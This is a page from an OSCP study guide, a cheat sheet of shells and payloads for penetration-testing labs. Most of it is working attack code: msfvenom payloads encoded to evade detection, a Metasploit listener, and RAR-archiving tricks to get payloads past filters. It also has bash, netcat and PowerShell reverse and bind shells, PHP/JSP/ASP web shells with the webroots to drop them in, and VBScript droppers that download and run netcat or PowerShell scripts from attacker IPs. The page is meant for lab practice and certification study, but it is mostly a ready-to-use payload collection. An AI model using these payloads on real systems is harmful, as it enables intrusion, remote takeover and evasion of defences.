OSCP
Total OSCP GuidePayloads All The Things
  • Welcome!
    • โฌ†๏ธPrivilege Escalation
      • ๐ŸชŸWindows
        • ๐Ÿ“‹Windows Privesc Checklist
        • ๐ŸšชBackdoor & RDP Access
        • Service Binary Hijacking
        • SeBackupPrivilege
        • SeRestorePrivilege
        • SeDebugPrivilege
        • SeEnableDelegationPrivilege
        • SeTakeOwnershipPrivilege
        • SeManageVolumePrivilege
        • SeLoadDriverPrivilege
        • DnsAdmins
        • Hyper-V Administrators
        • Server Operators
        • GPO
        • Mimikatz
        • Weak Permissions
        • Vulnerable Services
        • DLL Injection
        • Citrix Breakout
        • UAC
        • Credential Hunting
        • ๐Ÿ”ŽWindows Post Enumeration
        • ๐Ÿฅ”Potatoes
      • ๐ŸงLinux
        • ๐Ÿ“‹Linux Privesc Checklist
        • โœณ๏ธSudo Tar Wildcard
        • nfs privesc
        • โ†ป logrotate
        • Capabilities
        • Password Authentication Abuse
    • ๐Ÿ–ฅ๏ธActive Directory
      • ๐Ÿ”ŽAD Post Enumeration/Exploitation
        • ๐Ÿ”ŽPowerview
        • ๐ŸถBloodhound
      • ๐Ÿ”งAD Tools
      • ๐Ÿ‘พAD Exploitation
        • Post Exploitation
        • PowerShell
        • ๐Ÿ”ฅAsreproasting
        • ๐Ÿ”ฅKerberoasting
        • ๐Ÿ”DCSync
        • ๐Ÿฅ‡Golden Ticket Attacks
        • ๐ŸฅˆSilver Ticket Attack
        • PetitPotam
        • ๐ŸƒSMB Relaying
        • ๐Ÿ“œCertificate Authority (CA)
        • Pass the Password or Pass the Hash
        • โžก๏ธLateral Movement
          • Child-to-Parent CIFS
          • ExtraSids
    • ๐Ÿ”ŽEnumeration
      • ๐Ÿ“‹Enumeration Checklist
      • SNMP Enumeration
      • IRC Enumeration
      • FTP Enumeration
      • SMTP Enumeration
      • TFTP Enumeration
      • RPC Enumeration
      • Postgres Enumeration
      • Ldap Enumeration
      • RPC Enumeration
      • Strategy
      • RDP Session Hijacking
      • Bullet Proof Strategy Methodology
    • ๐Ÿ•ต๏ธโ€โ™‚๏ธExploitation
      • Client Side Attacks
        • ODT Macro (Libreoffice)
        • Microsoft Office Macros
      • ๐ŸšShells & Payloads
      • ๐Ÿ”Password Attacks
    • ๐Ÿ•ธ๏ธWeb Applications
      • SSRF
      • ๐Ÿ“‹Web Application Checklist
      • ๐Ÿ’‰SQL Injection
      • </> Command Injections
      • ๐Ÿž๏ธPath Traversal & File Inclusion
      • ๐Ÿ“คFile Upload Attacks
      • ๐Ÿ”“IDOR(Insecure Direct Object References)
      • โŒXSS (Cross-Site Scripting)
      • ๐Ÿ‘ฝXXE(XML External Entity)
      • ๐ŸฆชLog4Shell
      • ๐Ÿ’ปAbusing APIs
      • ๐Ÿ“–Custom Wordlist
      • ๐Ÿ“›Bypassing WAF
    • ๐Ÿ”€Pivoting
    • ๐Ÿ“File Transfer
    • Buffer Overflow
    • Miscellaneous
    • โ“‚๏ธMetasploit
    • ๐Ÿšถ Walkthroughs
      • Hack The Box
        • Absolute HTB
        • Active HTB
        • Arctic HTB
        • Bank Robber HTB
        • Bashed HTB
        • BLUE HTB
        • Cerberus HTB
        • Devel HTB
        • Escape HTB
        • Forest HTB
        • Granny HTB
        • Headless HTB
        • Jerry HTB
        • Kioptrix
        • Lame HTB
        • Legacy HTB
        • Netmon HTB
        • Nibbles HTB
        • Node HTB
        • Optimum HTB
        • Pandora HTB
        • Sense Htb
        • Soccer HTB
        • Stream IO
        • Support HTB
        • Updown HTB
      • PG Practice
        • Access 2
          • 80
          • Exploit
        • Apex
          • 80
          • 445
          • 3306
          • Exploit
        • Astronaut
          • 80
          • Exploit
        • Auth By
          • 21
          • 242
          • 3145
        • Billyboss
          • 21
          • 8081
        • Boolean
          • 80
          • 33017
          • Exploit
        • Bullybox
          • 80
          • Exploit
        • Clue
          • 445
          • 3000
          • 8021
          • Exploit
        • Cockpit
          • 80
          • 9090
          • Exploit
        • DVR 4
          • 22
          • 8080
        • Extplorer
          • 80
          • Exploit
        • Fanatastic
          • 3000
          • Exploit
        • Fired
          • 9090
          • 9091
        • Flu
          • 8090
          • Exploit
        • Hawat
          • 17445
          • 30455
          • 50080
          • Exploit
        • Heist
          • 80
          • Exploit
        • Hepet
          • 25
          • 143
          • 20001
          • 79 Finger
          • 8000 Or 443
          • Exploit
        • Hetemit
          • 80
          • 18000
          • 50000
          • Exploit
        • Hokkaido
          • 445
          • 1433
        • Hunit
          • 8080
          • 12445
          • 18030
          • Exploit
        • Hutch
          • 80
          • 389
          • 445
        • La Vita
          • 80
        • Levram
          • 8000
        • Marketing
          • 80
          • Exploit
        • Medjed
          • 445
          • 8000
          • 30021
          • 33033
          • 44330
          • 45332
          • Med Jed
        • Mzeeav
          • 80
        • Nagoya
        • Nickel
          • 22
          • 80
          • 8089
          • 33333
        • Nukem
          • 80
          • Exploit
        • Ochima
          • 8338
        • Payday
          • 80
          • RPC
        • Pc
          • 8000
          • 65432
          • Exploit
        • Peppo
          • 22
          • 113
          • 8080
          • Exploit
        • Post Fish
          • 22
          • 80
          • 143
          • Exploit
        • Pyloader
          • 9666
          • Exploit
        • Quacker Jack
          • 80
          • 445
          • 8081
          • Exploit
        • Readys
          • 80
          • 6379
          • Exploit
        • Resourced
        • Roquefort
          • 3000
          • Exploit
        • Scrutiny
          • 80
        • Shenzi
          • 80
          • 445
          • 3306
          • Exploit
        • Slort
          • 8080
          • Exploit
        • Sorcerer
          • 80
          • 7742
          • 8080
          • Exploit
        • Squid
          • 445
          • 3128
          • 8080
          • Exploit
        • Sybaris
          • 21
          • 6379
          • Exploit
        • Walla
          • 23
          • 25
          • 8091
          • Exploit
        • Wombo
          • 80
          • 6379
          • 8080
          • Exploit
        • Xposedapi
          • 13337
        • Zen Photo
          • 23
          • 80
          • 3306
          • Exploit
        • Zipper
          • 80
        • Access
        • Algernon
        • Bratarina
        • Clam AV
        • Craft
        • Exfiltrated
        • Heist
        • Helpdesk
        • Hokkaido
        • Internal
        • Jacko
        • Kevin
        • Nibbles
        • Pebbles
        • Pelican
        • Snookums
        • Twiggy
        • Vault
      • Try Hack Me
        • All Signs Point 2 Pwnage
          • 21
          • 80
          • 445
        • Attacktive Directory
          • 445
          • Kerberos
        • Blueprint
          • 445
          • 8080
          • Exploit
        • Hack Park
          • 80
        • Relevent
          • 80
          • 443
          • 445
          • 49663
          • Exploit
        • Weasel
          • 445
          • 8888
          • Exploit
        • Wreath
          • MS 01
            • 22
            • 443
            • 10000
          • Ms 02
            • 80
          • Ms 03
            • 80
            • Exploit
        • Year Of The Owl
          • 80
          • 161
          • 445
          • 5985
          • Exploit
      • Vuln Lab
        • Baby
        • Baby 2
        • Bamboo
        • Breach
        • Bruno
        • Data
        • Delegate
        • Dump
        • Escape
        • Feedback
        • Forgotten
        • Hybrid
        • Job 2
        • Lock
        • Media
        • Reflection
        • Retro
        • Sendai
        • Slonik
        • Sync
        • Tengu
        • Trusted
Powered by GitBook
On this page
  • Payloads
  • Listener
  • Archiving
  • Shells
  • Web Shells
  • VBScript Shell
  • Powershell:

Was this helpful?

  1. Welcome!
  2. Exploitation

Shells & Payloads

PreviousMicrosoft Office MacrosNextPassword Attacks

Last updated 8 months ago

Was this helpful?

Payloads

To use encoding:

x86/shikata_ga_nai is a popular encoder
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai
# -i for iterations

Listener

Netcat can not handle staged payloads

To use a meterpreter listener use:

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.50.1;set LPORT 443;run;"

Archiving

Archiving the payload:

wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a ~/test.rar -p ~/test.js

Removing the .RAR Extension

mv test.rar test

Archiving the Payload Again

rar a test2.rar -p test

Shells

  • Basic bash reverse shell:

bash -c 'bash -i >& /dev/tcp/10.10.14.37/9001 0>&1'
  • Reverse shell on linux

nc IP 4444 -e /bin/sh
  • Reverse shell on windows with psexec

psexec.py user:'password'@IP
  • windows netcat

nc.exe โ€“e cmd.exe IP 4444

Web Shells

Code: php

<?php system($_REQUEST["cmd"]); ?>

Code: jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Code: asp

<% eval request("cmd") %>

Default locations:

Web Server
Default Webroot

Apache

/var/www/html/

Nginx

/usr/local/nginx/html/

IIS

c:\inetpub\wwwroot\

XAMPP

C:\xampp\htdocs\

Example:

echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php

Then to access:

curl http://SERVER_IP:PORT/shell.php?cmd=id

VBScript Shell

Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.1.208/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.1.208 4445 -e cmd.exe"

or

CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-Object System.Net.WebClient).DownloadString('http://10.8.1.208/shell.ps1')"

Powershell:

Reverse shells:

powershell -c "iwr -uri 10.10.14.22/nc64.exe -outfile %temp%\\n.exe"; %temp%\\n.exe -e cmd.exe 10.10.14.22 9001
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

Bind shell:

// Some codepowershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
๐Ÿ•ต๏ธโ€โ™‚๏ธ
๐Ÿš

Staged payload:

Executes in multiple stages and is more complex and requires meterpreter listener

windows/shell/reverse_tcp

Stageless payload:

The payload app contains all shellcode required to execute hence larger in size. Shell can be caught in netcat. Try this first.

windows_shell_reverse_tcp
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master ยท swisskyrepo/PayloadsAllTheThingsGitHub
Refer for additional payloads
Logo